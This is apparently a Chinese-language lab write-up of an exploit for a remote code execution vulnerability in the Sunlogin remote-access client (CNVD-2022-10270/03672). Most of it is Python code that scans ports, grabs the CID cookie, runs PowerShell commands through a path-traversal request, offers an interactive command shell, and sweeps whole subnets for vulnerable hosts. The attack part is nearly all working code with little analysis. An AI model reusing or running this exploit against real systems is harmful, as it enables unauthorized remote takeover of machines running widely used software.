- 个人版 ≤ V11.0.0.33
- 简约版 ≤ V1.0.1.43315
- 漏洞编号:CNVD-2022-10270、CNVD-2022-03672
- 漏洞级别:高危
- Windows 10 家庭中文版
- Exeinfo PE - ver.
- upx - 3.96 - win64
- IDA Pro 7.5
- SunloginClient_11.0.0.33162_X64
- windows 7 家庭版
- windows 10 家庭中文版
- nmap、curl
- SunloginClient_11.0.0.33162_X64
- 对靶机进行端口扫描,判断是否有可利用端口
- 进行漏洞利用(1.拿CID 2.尝试RCE)
- 模拟 shell
1 from socket import *
3 def scanport(host, port):
4 try:
5 s = socket(AF_INET, SOCK_STREAM) #创建一个 socket
6 s.connect((host, port)) #创建一个连接
7 print(f"{port} open") #未出现错误则该端口存活
8 s.close()
9 except:
10 pass
12 def scan():
13 host = input("please enter your ip: ")
14 for i in range(45000,50000):
15 scanport(host,i)
16 if __name__ == '__main__':
17 scan()
1 from socket import *
2 import threading
4 def scanport(host, port):
5 try:
6 s = socket(AF_INET, SOCK_STREAM) #创建一个 socket
7 s.connect((host, port)) #创建一个连接
8 threading.Lock().acquire() # 创建互斥锁
9 print(f"{port} open") #未出现错误则该端口存活
10 threading.Lock().release() # 释放互斥锁
11 s.close() #释放 socket
12 except:
13 pass
15 def scan():
16 #host = input("please enter your ip: ")
17 host = ''
18 for port in range(45000,50000):
19 t = threading.Thread(target=scanport, args=(host, port))
20 t.start()
21 if __name__ == '__main__':
22 scan()
1 def check():
2 for port in ports:
3 print(f"check {port} ... ...")
4 host_url = 'http://' + str(host) + ':' + str(port)
5 try:
6 url = requests.get(host_url, timeout=1)
7 if str(url.json()) == "{'success': False, 'msg': 'Verification failure'}":
8 RCE_ports.append(port)
9 print(f"---------- {port} may be available! ----------")
10 except:
11 print(f"{port} cannot access.")
1 def RCE():
2 global RCE_port
3 host = ''
4 url = 'http://' + str(host) + ':' + str(RCE_port) + "/cgi-bin/rpc?action=verify-haras"
5 CID = str(requests.get(url).json())[-45:-13] #截取 CID
6 cookie = {"CID" : CID}
7 rce_url = 'http://' + str(host) + ':' + str(RCE_port) + "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+echo+1"
8 text = requests.get(rce_url, cookies=cookie).text
9 if str(text) == '1\r\n':
10 print(f"---------- {RCE_port} Rce succeeded! ----------")
1 def shell():
2 global RCE_port, cookie
3 print("start up ... ... \n@exit : q")
4 time.sleep(3)
5 cmd = ''
6 while cmd != 'q':
7 cmd = input(">: ")
8 url = 'http://' + str(host) + ':' + str(RCE_port) + '/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+' + str(cmd)
9 print(requests.get(url, cookies=cookie).text)
1 from socket import *
2 import threading
3 import requests
4 import time
6 def scanport(host, port):
7 try:
8 s = socket(AF_INET, SOCK_STREAM) #创建一个 socket
9 s.connect((host, port)) #创建一个连接
10 threading.Lock().acquire() # 创建互斥锁
11 ports.append(port) #未出现错误则该存活端口放入端口池
12 threading.Lock().release() # 释放互斥锁
13 s.close() #释放 socket
14 except:
15 pass
17 def scan():
18 print("---------- Start scan ----------")
19 for port in range(45000,50000):
20 t = threading.Thread(target=scanport, args=(host, port))
21 t.start()
22 print(f"----------------- Surviving ports: {ports} ----------------")
23 print(f"---------- Scan succeeded! ----------\n")
25 def check():
26 print("---------- Start check ----------")
27 global RCE_port
28 for port in ports:
29 print(f"check {port} ... ...")
30 host_url = 'http://' + str(host) + ':' + str(port)
31 try:
32 url = requests.get(host_url, timeout=1)
33 if str(url.json()) == "{'success': False, 'msg': 'Verification failure'}":
34 RCE_port = str(port)
35 print(f"\n----------------- {port} may be available! ----------------\n")
36 except:
37 print(f"{port} cannot access.")
38 print("---------- check end ----------\n")
39 print(f"---------------- RCE ports: {RCE_port} -----------------\n")
42 def RCE():
43 global RCE_port, cookie
44 print(f"Try RCE ... ...", end='')
45 url = 'http://' + str(host) + ':' + str(RCE_port) + "/cgi-bin/rpc?action=verify-haras"
46 CID = str(requests.get(url).json())[-45:-13] #截取 CID
47 cookie = {"CID" : CID}
48 rce_url = 'http://' + str(host) + ':' + str(RCE_port) + "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+echo+1"
49 text = requests.get(rce_url, cookies=cookie).text
50 if str(text) == '1\r\n':
51 print(f" *** {RCE_port} Rce succeeded! ----------\n")
52 return 1
53 return 0
54 '''
55 def shell():
56 global RCE_port, cookie
57 print("start up ... ... \n@'+' replace ' ' \n@exit : q")
58 time.sleep(3)
59 cmd = ''
60 while cmd != 'q':
61 cmd = input(">: ")
62 url = 'http://' + str(host) + ':' + str(RCE_port) + '/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+' + str(cmd)
63 print(requests.get(url, cookies=cookie).text)
64 '''
65 if __name__ == '__main__':
66 ports = [] # 端口池
67 RCE_port = ''
68 cookie = {}
69 host = input("please enter your ip: ")
70 scan()
71 check()
72 if RCE_port:
73 RCE()
1 from socket import *
2 import threading
3 import requests
4 import time
6 def scanport(host, port):
7 try:
8 s = socket(AF_INET, SOCK_STREAM) #创建一个 socket
9 s.connect((host, port)) #创建一个连接
10 threading.Lock().acquire() # 创建互斥锁
11 ports.append(port) #未出现错误则该存活端口放入端口池
12 threading.Lock().release() # 释放互斥锁
13 s.close() #释放 socket
14 except:
15 pass
17 def scan(host):
18 print("---------- Start scan ----------")
19 for port in range(45000,50000): #默认扫描 45000-50000 端口
20 t = threading.Thread(target=scanport, args=(host, port))
21 t.start()
22 print(f"----------------- Surviving ports: {ports} ----------------")
23 print(f"---------- Scan succeeded! ----------\n")
25 def check(host):
26 print("---------- Start check ----------")
27 global RCE_port
28 for port in ports:
29 print(f"check {port} ... ...")
30 host_url = 'http://' + str(host) + ':' + str(port)
31 try:
32 url = requests.get(host_url, timeout=1)
33 if str(url.json()) == "{'success': False, 'msg': 'Verification failure'}":
34 RCE_port = str(port)
35 print(f"\n----------------- {port} may be available! ----------------\n")
36 except:
37 print(f"{port} cannot access.")
38 print("---------- check end ----------\n")
39 print(f"---------------- RCE ports: {RCE_port} -----------------\n")
42 def RCE(host,port):
43 print(f"Try RCE ... ...", end='')
44 url = 'http://' + str(host) + ':' + str(port) + "/cgi-bin/rpc?action=verify-haras"
45 CID = str(requests.get(url).json())[-45:-13] #截取 CID
46 cookie = {"CID" : CID}
47 rce_url = 'http://' + str(host) + ':' + str(port) + "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+echo+1"
48 text = requests.get(rce_url, cookies=cookie).text
49 if str(text) == '1\r\n':
50 print(f" *** {port} Rce succeeded! ----------\n")
51 return 1
52 return 0
53 '''
54 def shell():
55 global RCE_port, cookie
56 print("start up ... ... \n@'+' replace ' ' \n@exit : q")
57 time.sleep(3)
58 cmd = ''
59 while cmd != 'q':
60 cmd = input(">: ")
61 url = 'http://' + str(host) + ':' + str(RCE_port) + '/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+' + str(cmd)
62 print(requests.get(url, cookies=cookie).text)
63 '''
64 if __name__ == '__main__':
65 key = input('Please select scan mode\n 1: ip \n 2: segment\n>: ')
66 if key == '1':
67 ports = [] # 端口池
68 RCE_port = ''
69 cookie = {}
70 host = input("please enter your ip: ")
71 scan(host)
72 check(host)
73 if RCE_port:
74 RCE(host,RCE_port)
75 else:
76 host = input('please enter your ip: eg.xx.xx.xx \n>: ')
77 RCE_ip = [] #可利用的 ip 池
78 for c in range(1,256): #枚举
79 host_1 = host + '.' + str(c)
80 ports = []
81 RCE_port = ''
82 cookie = {}
83 print(f"---------------------- check {host_1} ----------------------")
84 scan(host_1)
85 check(host_1)
86 if RCE_port:
87 if RCE(host_1,RCE_port):
88 RCE_ip.append(str(host_1) + ':' + str(RCE_port))
89 print(f"---------------------- end! ----------------------\n")
90 print(f"---------------------- RCE ip {RCE_ip} ----------------------\n")
1 def RCE(host,port):
2 print(f"Try RCE ... ...", end='')
3 try:
4 url = 'http://' + str(host) + ':' + str(port) + "/cgi-bin/rpc?action=verify-haras"
5 CID = str(requests.get(url).json())[-45:-13] #截取 CID
6 cookie = {"CID" : CID}
7 except:
8 print(f"{port} is Unusable!")
9 try:
10 rce_url = 'http://' + str(host) + ':' + str(port) + "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+echo+1"
11 text = requests.get(rce_url, cookies=cookie).text
12 if str(text) == '1\r\n':
13 print(f" *** {port} Rce succeeded! ----------\n")
14 return 1
15 except:
16 print(f"{port} is Unusable!")
17 return 0
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